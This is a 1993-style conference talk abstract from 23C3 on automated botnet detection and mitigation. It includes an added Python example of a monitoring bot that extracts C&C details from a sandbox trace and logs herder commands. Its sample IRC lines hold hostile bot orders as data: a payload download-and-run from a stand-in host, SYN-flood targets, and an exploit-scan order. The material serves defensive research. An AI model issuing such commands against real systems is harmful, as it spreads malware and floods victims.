23C3 - 1.5

23rd Chaos Communication Congress
Who can you trust?

Georg 'oxff' Wicherski
Day 4
Room Saal 2
Start time 11:30
Duration 01:00
ID 1342
Event type Lecture
Track Hacking
Language English

Automated Botnet Detection and Mitigation

How to find, invade and kill botnets automated and effectively

Botnets are one of the buzziest buzzwords in the computer security world today. The approach presented here lets us deal with them reliably, so that managers hopefully will no longer panic at the word "botnet" in 2008. The technology chain allows for automated capture of malware with the now somewhat known nepenthes daemon, automated analysis with CWSandbox and other sandboxes, automated botnet snooping with the botsnoopd daemon and finally (semi-)automated mitigation using various weapons. Hopefully, our autonomous approach will never turn against the human race and begin the final war...

This presentation explains the various components of our approach to botnet detection and mitigation from the beginning to the end in detail.

First, we will have a look at nepenthes: see how it has evolved, how it works, and also point out some weaknesses. nepenthes is a versatile tool for malware collection, available under the GPL at <http://nepenthes.mwcollect.org/>. Although people have presented it at various conferences, the tool is still unknown to many malware researchers. Additionally, most presentations focus on the results you can achieve with nepenthes, whereas this presentation will show how it really works.

The next step in botnet mitigation is to sandbox the malware to gather information about the botnet itself, e.g. the server hostname and channel names for IRC botnets, or the corresponding connection details for other types of botnet. Our current approach is based on the CWSandbox developed by Carsten Willems at RWTH Aachen, which is not available to the public. We also work with the Chinese Honeynet Project's MWSniffer, experiment with the Norman Sandbox and plan to include Emsi's CodeKnigge in the future.

After sandboxing the malware, we automatically connect into the botnet, snoop all relevant commands and traffic, and generate statistics (some fancy charts, that is). This allows us to produce statistics about DDoS attacks carried out through monitored botnets, gather intelligence about identity theft and provide law enforcement (LEOs) with relevant information, which is the most reliable way to mitigate botnets. We closely cooperate with the ShadowServer crew for botnet monitoring.
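The two automated steps described above, pulling the C&C parameters out of a sandbox trace and then joining the channel as a fake bot that logs commands and tallies DDoS orders, as an added example. This is not code from nepenthes, CWSandbox or botsnoopd; the sandbox trace format, the server lines and the dot-prefixed bot command syntax are all constructed for illustration, and real bot families differ.

```python
"""Toy sandbox-to-snooper pipeline. Added example, not the code of nepenthes,
CWSandbox or botsnoopd. Trace format, server lines and command syntax are
constructed for illustration."""
from collections import Counter

# Constructed sandbox network trace of the malware's first IRC session:
# ("connect", host, port) records and ("send", raw client line) records.
SANDBOX_TRACE = [
    ("connect", "c2.example.net", 6667),
    ("send", "PASS s3cr3t"),
    ("send", "NICK [DE|XP]123456"),
    ("send", "USER x 0 0 :x"),
    ("send", "JOIN ##bots k3y"),
]

# Constructed server->client lines the fake bot receives after connecting.
# Command syntax is rbot-style and made up; "332" is the channel topic reply.
SERVER_LINES = [
    ":c2.example.net NOTICE AUTH :*** Looking up your hostname...",
    "PING :8A2B3C",
    ":c2.example.net 001 [DE|XP]999999 :Welcome",
    ":c2.example.net 332 [DE|XP]999999 ##bots :.scan.start lsass 100 3 0.0.0.0 0 -b",
    ":h3rd3r!op@c2.example.net PRIVMSG ##bots :.ddos.syn 192.0.2.10 80 600",
    ":h3rd3r!op@c2.example.net PRIVMSG ##bots :.ddos.syn 192.0.2.10 80 600",
    ":h3rd3r!op@c2.example.net PRIVMSG ##bots :.download http://198.51.100.7/u.exe c:\\u.exe 1",
    ":somebot!x@10.0.0.5 PRIVMSG ##bots :[SCAN]: Exploited 10.0.0.9",
]

CMD_PREFIX = "."  # assumed marker for herder commands


def extract_c2(trace):
    """Recover everything a fake bot needs from the outbound IRC handshake."""
    c2 = {"server": None, "port": None, "password": None,
          "nick": None, "channel": None, "key": None}
    for rec in trace:
        if rec[0] == "connect":
            c2["server"], c2["port"] = rec[1], rec[2]
        elif rec[0] == "send":
            parts = rec[1].split()
            verb = parts[0].upper()
            if verb == "PASS":
                c2["password"] = parts[1]
            elif verb == "NICK":
                c2["nick"] = parts[1]
            elif verb == "JOIN":
                c2["channel"] = parts[1]
                c2["key"] = parts[2] if len(parts) > 2 else None
    return c2


def parse_irc(line):
    """Split an IRC line into (prefix, COMMAND, params); trailing arg is last."""
    prefix = None
    if line.startswith(":"):
        prefix, line = line[1:].split(" ", 1)
    trailing = None
    if " :" in line:
        line, trailing = line.split(" :", 1)
    parts = line.split()
    cmd = parts[0].upper() if parts else ""
    params = parts[1:]
    if trailing is not None:
        params.append(trailing)
    return prefix, cmd, params


def snoop(inbound, c2, nick):
    """Act as a minimal bot: answer PING, join on welcome, log commands that
    arrive via channel/private message or via the channel topic."""
    outbound, commands = [], []
    for raw in inbound:
        prefix, cmd, params = parse_irc(raw)
        if cmd == "PING":
            outbound.append("PONG :" + params[-1])
        elif cmd == "001":  # RPL_WELCOME: registration done, join the channel
            outbound.append("JOIN " + c2["channel"] + (" " + c2["key"] if c2["key"] else ""))
        elif cmd in ("PRIVMSG", "NOTICE") and params[0] in (c2["channel"], nick):
            if params[-1].startswith(CMD_PREFIX):
                commands.append((prefix.split("!")[0] if prefix else "?", params[-1]))
        elif cmd in ("TOPIC", "332") and params[-1].startswith(CMD_PREFIX):
            commands.append(("topic", params[-1]))
    return outbound, commands


def ddos_stats(commands):
    """Tally command verbs and (target, port) pairs of DDoS orders."""
    verbs, targets = Counter(), Counter()
    for _, text in commands:
        words = text.split()
        verbs[words[0]] += 1
        if words[0].startswith(".ddos") and len(words) >= 3:
            targets[(words[1], words[2])] += 1
    return verbs, targets


def run_pipeline():
    c2 = extract_c2(SANDBOX_TRACE)
    # A real snooper would mimic the observed nick pattern; fixed here.
    outbound, commands = snoop(SERVER_LINES, c2, nick="[DE|XP]999999")
    verbs, targets = ddos_stats(commands)
    return c2, outbound, commands, verbs, targets


if __name__ == "__main__":
    c2, outbound, commands, verbs, targets = run_pipeline()
    print("C&C:", c2)
    print("sent:", outbound)
    for who, text in commands:
        print("cmd from", who + ":", text)
    print("DDoS targets:", dict(targets))
```

The snooper deliberately never executes anything it reads; it only answers what the server needs to keep the session alive and records the rest, which is the posture a monitoring bot has to keep so it cannot be turned into a participant in the attacks it observes.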

Once a botnet has been identified as a severe threat to the Internet, it can be shut down (semi-)automatically. Since we wanted to stay away from a fully automated atomic weapon that might be tricked into firing autonomously at Washington, D.C., a human still has to confirm the mitigation step. Mitigation involves notifying the ASNs involved, sinkholing the botnet and poisoning its DNS names. Additionally, cooperation with some German ISPs will hopefully enable us to cut infected clients off the Internet in the future.